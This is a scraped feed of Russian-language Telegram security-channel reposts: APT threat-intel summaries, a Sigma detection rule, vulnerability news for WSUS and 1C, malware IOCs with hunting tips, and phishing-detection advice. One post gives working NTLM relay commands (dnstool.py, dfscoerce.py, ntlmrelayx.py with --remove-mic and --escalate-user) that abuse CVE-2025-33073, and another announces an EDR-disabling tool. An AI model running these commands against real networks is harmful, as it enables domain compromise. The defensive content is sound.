Forwarded from Threat Hunting Father 🦔
APT as a Service?😃
Premier Pass-as-a-Service — новый формат кибершпионажа
Trend Micro зафиксировала новую модель сотрудничества между multiple China-aligned APT groups — Earth Estries и Earth Naga.
Одна группа предоставляет готовый доступ («Premier Pass»), другая — разворачивает свои инструменты. Это делает шпионские кампании сложнее для атрибуции и детектирования.
⚙️ Формат атаки
• Earth Estries скомпрометировала внутренние веб-сервера и установила CrowDoor (бэкдор через DLL-sideloading).
• Через тот же доступ Estries передала контроль Earth Naga, которая развернула ShadowPad — известный фреймворк для постэксплуатации.
• В сетях жертв фиксировались совместные артефакты: CrowDoor → ShadowPad, общий C2, и одинаковые временные файлы.
• Обе группы параллельно атаковали телеком-операторов, госучреждения и ритейл в APAC и НАТО-регионах.
🧠 Новый тренд от Trend Micro
Исследователи назвали модель Premier Pass-as-a-Service — аналог «доступа как услуги»:
Это сдвигает фокус с Initial Access Brokers на операционные альянсы между APT-группами.
Trend Micro выделила четыре уровня такой кооперации — от случайного пересечения до полного предоставления инфраструктуры («операционного бокса») для другой группы.
Самый продвинутый тип — использование облачных сервисов (например, VSCode Remote Tunnel) как RAT-канала.
🧰 Инструментарий
Earth Estries:
• CrowDoor — DLL-sideload через
• Draculoader — загрузчик shellcode, финальные пейлоады CrowDoor / Cobalt Strike / HEMIGATE.
• Cobalt Strike — lateral movement / payload-доставка.
• Post-exploitation: AnyDesk, EarthWorm (SOCKS5 туннель), Blindsight (LSASS dump с NTFS evasion), кастомный SSP-дампер.
Earth Naga:
• ShadowPad — бэкдор с зашифрованным payload в реестре, загружается через
• Активно атакует гос- и телеком-сектор, Тайвань, APAC, НАТО, Латинскую Америку.
🧩 Что нового заметила Trend Micro
1) Коллаборация вместо одиночных кампаний — группировки действуют как «подрядчики» в единой операции.
2) Смещение стадии совместной работы — обмен происходит на поздних этапах (C2 и постэксплуатация), а не на этапе входа.
3) Роль-модель вместо атрибуции: разделение на разработчиков, провайдеров и операторов.
4) Доказательства общей инфраструктуры — CrowDoor и ShadowPad фиксируются в одной сессии, одних узлах.
5) «Operational box» и облачные туннели — новый способ маскировки C2 и снятия сетевых привязок.
📎 https://www.trendmicro.com/en_us/research/25/j/premier-pass-as-a-service.html
🦔 THF
Premier Pass-as-a-Service — новый формат кибершпионажа
Trend Micro зафиксировала новую модель сотрудничества между multiple China-aligned APT groups — Earth Estries и Earth Naga.
Одна группа предоставляет готовый доступ («Premier Pass»), другая — разворачивает свои инструменты. Это делает шпионские кампании сложнее для атрибуции и детектирования.
• Earth Estries скомпрометировала внутренние веб-сервера и установила CrowDoor (бэкдор через DLL-sideloading).
• Через тот же доступ Estries передала контроль Earth Naga, которая развернула ShadowPad — известный фреймворк для постэксплуатации.
• В сетях жертв фиксировались совместные артефакты: CrowDoor → ShadowPad, общий C2, и одинаковые временные файлы.
• Обе группы параллельно атаковали телеком-операторов, госучреждения и ритейл в APAC и НАТО-регионах.
Исследователи назвали модель Premier Pass-as-a-Service — аналог «доступа как услуги»:
Вместо продажи первичного входа, акторы предоставляют прямой доступ к уже закреплённым активам.
Это сдвигает фокус с Initial Access Brokers на операционные альянсы между APT-группами.
Trend Micro выделила четыре уровня такой кооперации — от случайного пересечения до полного предоставления инфраструктуры («операционного бокса») для другой группы.
Самый продвинутый тип — использование облачных сервисов (например, VSCode Remote Tunnel) как RAT-канала.
Earth Estries:
• CrowDoor — DLL-sideload через
LogServer.exe → VERSION.dll → зашифрованный shellcode.• Draculoader — загрузчик shellcode, финальные пейлоады CrowDoor / Cobalt Strike / HEMIGATE.
• Cobalt Strike — lateral movement / payload-доставка.
• Post-exploitation: AnyDesk, EarthWorm (SOCKS5 туннель), Blindsight (LSASS dump с NTFS evasion), кастомный SSP-дампер.
Earth Naga:
• ShadowPad — бэкдор с зашифрованным payload в реестре, загружается через
bdreinit.exe → wer.dll.• Активно атакует гос- и телеком-сектор, Тайвань, APAC, НАТО, Латинскую Америку.
1) Коллаборация вместо одиночных кампаний — группировки действуют как «подрядчики» в единой операции.
2) Смещение стадии совместной работы — обмен происходит на поздних этапах (C2 и постэксплуатация), а не на этапе входа.
3) Роль-модель вместо атрибуции: разделение на разработчиков, провайдеров и операторов.
4) Доказательства общей инфраструктуры — CrowDoor и ShadowPad фиксируются в одной сессии, одних узлах.
5) «Operational box» и облачные туннели — новый способ маскировки C2 и снятия сетевых привязок.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1
Forwarded from Whitehat Lab
Платформа с открытым исходным кодом для обмена, оценки, улучшения и управления правилами обнаружения (YARA, Sigma, Suricata и др.) с поддержкой API
Форматы:
Yara
Sigma
Zeek
Suricata
Crs
Nova
Elastic
Пример:
title: Encoded or Base64 Payload in HTTP POST to F5 Management API
id: f5-base64-upload-2025
description: Detects long base64 strings in HTTP POST body to management or shared endpoints.
author: abdulmyid@gmail.com
status: experimental
logsource:
product: webproxy
service: http
detection:
selection:
http.method: POST
url|contains:
- '/mgmt'
- '/shared'
http.request.body|contains_regexp: '[A-Za-z0-9+/]{200,}={0,2}'
condition: selection
level: medium
falsepositives:
- Legitimate encoded payloads (token exchanges, APIs).
#ti #rules #detection #soc #api
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Всем привет!
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
А у нас вновь новости про NTLM Relay! Уж сколько раз твердили миру... Не суть : )
Итак, начнем с Coercов:
1. В Win11 теперь уязвимая к Printerbug служба работает не поверх именованных каналов (
ncacn_np), а поверх TCP, поэтому появился POC, подключающийся к службе поверх ncacn_ip_tcp: https://github.com/decoder-it/printerbugnew/tree/main2. Служба , уязвимая к PetitPotam, может не работать по дефолту, но мы можем попробовать ее включить, например, с помощью модуля efsr_spray.py. Подобный трюк, но уже с взаимодействием с нужным именованным каналом для включения Remote Registry может быть применен так:
echo start > \\.\pipe\winreg. Все эти методы включения объединены под одним большим механизмом Service Triggers, подробный разбор которого вышел у наших коллег из TrustedSec.Затем появились чудесные новости — выложили радужные таблицы под NetNTLMv1. Пусть и в 2025 году : )
Но самый любопытный трюк я подглядел сегодня в твиттере. В этом году вышла бага — Kerberos Reflection Attack. Вкратце: TGS тикет система получает на одно устройство, отдает его атакующему, а он в свою очередь его без проблем использует. Мы можем использовать эту CVE-2025-33073 и с NTLM для, например, обхода подписи! Делается следующим образом:
# Атакуем комп с именем DC
dnstool.py -u 'lowpriv\lab1.lab' -p 123 <dns ip> -a add -r DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d <kali IP>
dfscoerce.py -u lowpriv -p 123 -d lab1.lab DC1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA <dc ip>
ntlmrelayx.py --remove-mic -smb2support -t ldaps://<dc ip> --escalate-user test --no-validate-privs
www.opennet.ru
Проект Python отказался от гранта в 1.5 млн долларов на повышение защищённости PyPI
Организация Python Software Foundation, курирующая разработку языка программирования Python, отказалась от получения гранта в 1.5 млн долларов, одобренного Национальным научным фондом США в рамках программы "Безопасность, защита и конфиденциальность Open…
🔗Ссылка:
https://opennet.ru/64123/
https://opennet.ru/64123/
Forwarded from Pentest Notes
🚨Участились попытки эксплуатации новой критической уязвимости 1С Предприятия - BDU:2025-07182 (Bypass авторизации).
Уязвимость технологической платформы «1С:Предприятие 8» связана с недостатками процедуры авторизации. Эксплуатация уязвимости, может позволить нарушителю, действующему удаленно, получить несанкционированный доступ к системе от имени произвольного пользователя.
CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 3.1 8.8/10
BDU:2025-07182
Рекомендую как можно быстрее обновиться.
💫 @pentestnotes
Уязвимость технологической платформы «1С:Предприятие 8» связана с недостатками процедуры авторизации. Эксплуатация уязвимости, может позволить нарушителю, действующему удаленно, получить несанкционированный доступ к системе от имени произвольного пользователя.
CVSS 3.0: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS 3.1 8.8/10
BDU:2025-07182
Рекомендую как можно быстрее обновиться.
Please open Telegram to view this post
VIEW IN TELEGRAM
Метаданные файлов LibreOffice: извлечение, удаление и редактирование
https://hackware.ru/?p=9290
Данная статья посвящена метаданным в файлах LibreOffice. Этот офисный пакет является бесплатным, у него открыт исходный код, он кроссплатформенный и довольно популярный. Имеет хорошую совместимость с MS Office и в целом является очень хорошей альтернативой MS Office.🔗Ссылка:
https://hackware.ru/?p=9290
Forwarded from AP Security
#infosec
Эксплойт в открытом доступе запустил волну атак на WSUS. Windows-серверы крушат одним кликом📌
Хакеры начали активно эксплуатировать уязвимость в службе обновлений Windows Server Update Services (WSUS). Ошибка зарегистрирована как CVE-2025-59287 и уже имеет публично доступный PoC-код, что значительно повышает риск массовых атак.
Уязвимость затрагивает только серверы Windows, где включена роль WSUS Server и система настроена на распространение обновлений другим WSUS-инстансам в сети — этот режим по умолчанию обычно отключён.
Microsoft выпустила внеплановые обновления, устраняющие уязвимость, и рекомендует установить их как можно скорее. Исправления доступны для всех поддерживаемых версий Windows Server: KB5070881 для Windows Server 2025, KB5070879 для версии 23H2, KB5070884 для 2022, KB5070883 для 2019, KB5070882 для 2016, а также KB5070886 и KB5070887 для 2012 R2 и 2012.
Эксплойт в открытом доступе запустил волну атак на WSUS. Windows-серверы крушат одним кликом
Хакеры начали активно эксплуатировать уязвимость в службе обновлений Windows Server Update Services (WSUS). Ошибка зарегистрирована как CVE-2025-59287 и уже имеет публично доступный PoC-код, что значительно повышает риск массовых атак.
Уязвимость затрагивает только серверы Windows, где включена роль WSUS Server и система настроена на распространение обновлений другим WSUS-инстансам в сети — этот режим по умолчанию обычно отключён.
Microsoft выпустила внеплановые обновления, устраняющие уязвимость, и рекомендует установить их как можно скорее. Исправления доступны для всех поддерживаемых версий Windows Server: KB5070881 для Windows Server 2025, KB5070879 для версии 23H2, KB5070884 для 2022, KB5070883 для 2019, KB5070882 для 2016, а также KB5070886 и KB5070887 для 2012 R2 и 2012.
Please open Telegram to view this post
VIEW IN TELEGRAM
SecurityLab.ru
Эксплойт в открытом доступе запустил волну атак на WSUS. Windows-серверы крушат одним кликом
CVE-2025-59287: как получить права SYSTEM без авторизации…
👍2
Forwarded from Whitehat Lab
Zerosalarium
Using EDR-Redir To Break EDR Via Bind Link and Cloud Filter
EDR-Redir uses BindLink Filter and Windows Cloud Filter to inject, corrupt, and disable EDRs.
Инструмент для редиректа директории EDR в другое место
Протестировано:
EDR-Redir uses a Bind Filter (mini filter bindflt.sys) and the Windows Cloud Filter API (cldflt.sys) to redirect the Endpoint Detection and Response (EDR) 's working folder to a folder of the attacker's choice. Alternatively, it can make the folder appear corrupt to prevent the EDR's process services from functioning
#windows #edr #redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Detection is easy
Всем привет! 💻 ✌️
Продолжим разбор шпионской кампании ForumTroll
Атакующие использовали шпионское ПО LeetAgent - его команды написаны Leet стилем:
🔤
🔤
🔤
У ВПО есть функционал кейлоггера и стиллера для документов -
Для хостинга C2 использовалась инфраструктура, задействующая
Исследователям удалось атрибутировать кампанию и откатить её активность как минимум до 2022 года. Векторы распространения — фишинг
🔤
🔤
🔤
Также удалось обнаружить схожую кампанию:
🔤
🔤
🔤
По набору ТТП исследователи подтвердили связь между операциями. В рамках кампании был обнаружен коммерческий вредонос
Вредонос проверяет строки связанные с виртуальными машинами и утилитами для реверса
У каждой жертвы Dante есть
В реестре встречается ключ:
🔭 Обнаружение:
🔤 хантим названия директорий
🔤 проверяем ключи реестра на наличие аномалий
#detection@detectioneasy
#ttp@detectioneasy
Продолжим разбор шпионской кампании ForumTroll
Атакующие использовали шпионское ПО LeetAgent - его команды написаны Leet стилем:
0xC033A4D - COMMAND0xECEC - EXEC0x6E17A585 - GETTASKSУ ВПО есть функционал кейлоггера и стиллера для документов -
*.doc, *.xls, *.ppt, *.rtf, *.pdf, *.docx, *.xlsx, *.pptxДля хостинга C2 использовалась инфраструктура, задействующая
Fastly.netИсследователям удалось атрибутировать кампанию и откатить её активность как минимум до 2022 года. Векторы распространения — фишинг
Балтийский_Вектор_2023.isoDRIVE.GOOGLE.COM (исполняемый файл)Приглашение_Россия-Беларусь_крепкое_партнёрство_2024.lnkТакже удалось обнаружить схожую кампанию:
SCAN_XXXX_<DATE>.pdf.lnk<DATE>_winscan_to_pdf.pdf.lnkРостелеком.pdf.lnkПо набору ТТП исследователи подтвердили связь между операциями. В рамках кампании был обнаружен коммерческий вредонос
DanteDante имеет большой набор проверок на запуск в песочнице, но из всех выделяется проверка строк в журналах событий Windows
Вредонос проверяет строки связанные с виртуальными машинами и утилитами для реверса
У каждой жертвы Dante есть
infection-GUID на основе которого формируется имя директории для хранения остальных модулей и ключ реестра для настроек. Папка с модулями Dante расположена в %LocalAppData%. Ее имя представляет собой строку в Base64 длиной в восемь байт. В ней содержатся файлы без расширений с именами в виде строк в Base64 длиной в восемь байт. Имя одного из файлов совпадает с именем папки. Эту информацию можно использовать для того, чтобы идентифицировать активные заражения.
В реестре встречается ключ:
HKCU\Software\Classes\.zdmtnd\OpenWithProgids - zdmtnd - часть от Base64(GUID)(?:\w\d){8} и увеличиваем критичность, если внутри файл с таким же именемHKCU\Software\Classes\.zdmtnd\OpenWithProgids, где имя расширения/ключа выглядит как Base64-строка#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
www.opennet.ru
Релиз Tor Browser 15.0
Представлен выпуск специализированного браузера Tor Browser 15.0, в котором осуществлён переход на ESR-ветку Firefox 140. Браузер сосредоточен на обеспечении конфиденциальности и безопасности, весь трафик перенаправляется только через сеть Tor. Обратиться…
🔗Ссылка:
https://opennet.ru/64131/
https://opennet.ru/64131/
Forwarded from ESCalator
Поиск фишинговой инфраструктуры на этапе подготовки 🧱
В защите организации от фишинговых угроз полезно не ограничиваться только блокировкой уже разосланных писем и URL-ссылок. Необходимо применять техники обнаружения угроз на этапе подготовки. Пока злоумышленник регистрирует домен или выпускает SSL-сертификат, мы можем попытаться его вычислить и нейтрализовать, не дожидаясь первой жертвы.
Далее разберем некоторые инструменты и тактики проактивной защиты от фишинга.
Мониторинг доменов💻
Первое, что делает злоумышленник, — регистрирует домен. В случае подделки какого-то оригинального сервиса можно ожидать, что регистрируемый домен будет визуально схож с подделываемым доменом. Это классический сквоттинг.
Мы можем настроить мониторинг и реагировать на регистрацию тех доменов, которые схожи с интересующими нас сервисами и брендами. Важно помнить, что регистрировать подобные домены могут и сами владельцы, поэтому необходимо дополнительно проверять регистрантов домена и сравнивать их с оригиналом, чтобы избежать ложноположительных сработок.
Анализ SSL-сертификатов🤔
Малое число переходов по ссылкам без валидного SSL-сертификата вынуждает злоумышленников озадачиться его выпуском. Большинство известных крупных центров сертификации ведут открытое журналирование всех выпускаемых SSL-сертификатов, и полученный из него список объектов защиты может быть использован для анализа. Методика анализа может быть такой же, как и для доменов, полученных путем мониторинга. Стоит отметить, что сам факт выпуска SSL-сертификата для подозрительного домена может считаться признаком планируемой на ближайшее будущее фишинговой атаки.
Проверка хостнеймов на домене😐
Часто встречаются ситуации, когда жадные руки злоумышленника одновременно тянутся к большому числу брендов. Для этого он регистрирует один домен и один wildcard-сертификат, причем этот домен визуально ни с чем не схож. Для разделения между подделываемыми брендами злоумышленник использует домены более высокого уровня, например
Получить у DNS-сервера полный состав доменной зоны практически невозможно и на большом потоке доменных имен не принесет результата. Здесь необходимо будет воспользоваться собранными из внешних источников или TI-порталов разведданными либо попробовать самостоятельно перебрать различные поддомены на предмет их существования.
Связи по регистрантам🕊
Анализ данных о владельце домена может выявить сеть связанных ресурсов, зарегистрированных одной и той же организацией для серии атак. Связующим индикатором может быть имя регистранта (если оно не скрыто настройками приватности) или же его контактная информация: email или телефон. По мере накопления знаний, полученных в процессе проактивного поиска фишинговых доменов, мы можем собрать список недобросовестных регистрантов и по нему реагировать на новые публикации доменов. Конечно, рассчитывать на то, что злоумышленник под одним и тем же именем (не скрытым настройками приватности) будет раз за разом публиковать фишинговые домены, крайне оптимистично, но данный инструмент проверки не должен быть исключен из арсенала.
🏗По итогу, обнаружив «строящуюся» фишинговую площадку, мы можем:
• внести обнаруженные сетевые индикаторы во внутренние списки в средствах защиты информации;
• предупредить сотрудников организации или пользователей сервиса;
• при наличии опубликованного фишингового контента или почтовой рассылки — передать эти сведения регистратору и хостинг-провайдеру для проведения takedown'а и снижения эффективности атаки.
#TI #tip #phishing
@ptesacaltor
В защите организации от фишинговых угроз полезно не ограничиваться только блокировкой уже разосланных писем и URL-ссылок. Необходимо применять техники обнаружения угроз на этапе подготовки. Пока злоумышленник регистрирует домен или выпускает SSL-сертификат, мы можем попытаться его вычислить и нейтрализовать, не дожидаясь первой жертвы.
Далее разберем некоторые инструменты и тактики проактивной защиты от фишинга.
Мониторинг доменов
Первое, что делает злоумышленник, — регистрирует домен. В случае подделки какого-то оригинального сервиса можно ожидать, что регистрируемый домен будет визуально схож с подделываемым доменом. Это классический сквоттинг.
Мы можем настроить мониторинг и реагировать на регистрацию тех доменов, которые схожи с интересующими нас сервисами и брендами. Важно помнить, что регистрировать подобные домены могут и сами владельцы, поэтому необходимо дополнительно проверять регистрантов домена и сравнивать их с оригиналом, чтобы избежать ложноположительных сработок.
Анализ SSL-сертификатов
Малое число переходов по ссылкам без валидного SSL-сертификата вынуждает злоумышленников озадачиться его выпуском. Большинство известных крупных центров сертификации ведут открытое журналирование всех выпускаемых SSL-сертификатов, и полученный из него список объектов защиты может быть использован для анализа. Методика анализа может быть такой же, как и для доменов, полученных путем мониторинга. Стоит отметить, что сам факт выпуска SSL-сертификата для подозрительного домена может считаться признаком планируемой на ближайшее будущее фишинговой атаки.
Проверка хостнеймов на домене
Часто встречаются ситуации, когда жадные руки злоумышленника одновременно тянутся к большому числу брендов. Для этого он регистрирует один домен и один wildcard-сертификат, причем этот домен визуально ни с чем не схож. Для разделения между подделываемыми брендами злоумышленник использует домены более высокого уровня, например
<brand>.domain.xyz. Наличие подобных поддоменов у вновь зарегистрированного домена может быть индикатором готовности к проведению фишинговой атаки.Получить у DNS-сервера полный состав доменной зоны практически невозможно и на большом потоке доменных имен не принесет результата. Здесь необходимо будет воспользоваться собранными из внешних источников или TI-порталов разведданными либо попробовать самостоятельно перебрать различные поддомены на предмет их существования.
Связи по регистрантам
Анализ данных о владельце домена может выявить сеть связанных ресурсов, зарегистрированных одной и той же организацией для серии атак. Связующим индикатором может быть имя регистранта (если оно не скрыто настройками приватности) или же его контактная информация: email или телефон. По мере накопления знаний, полученных в процессе проактивного поиска фишинговых доменов, мы можем собрать список недобросовестных регистрантов и по нему реагировать на новые публикации доменов. Конечно, рассчитывать на то, что злоумышленник под одним и тем же именем (не скрытым настройками приватности) будет раз за разом публиковать фишинговые домены, крайне оптимистично, но данный инструмент проверки не должен быть исключен из арсенала.
🏗По итогу, обнаружив «строящуюся» фишинговую площадку, мы можем:
• внести обнаруженные сетевые индикаторы во внутренние списки в средствах защиты информации;
• предупредить сотрудников организации или пользователей сервиса;
• при наличии опубликованного фишингового контента или почтовой рассылки — передать эти сведения регистратору и хостинг-провайдеру для проведения takedown'а и снижения эффективности атаки.
#TI #tip #phishing
@ptesacaltor
Please open Telegram to view this post
VIEW IN TELEGRAM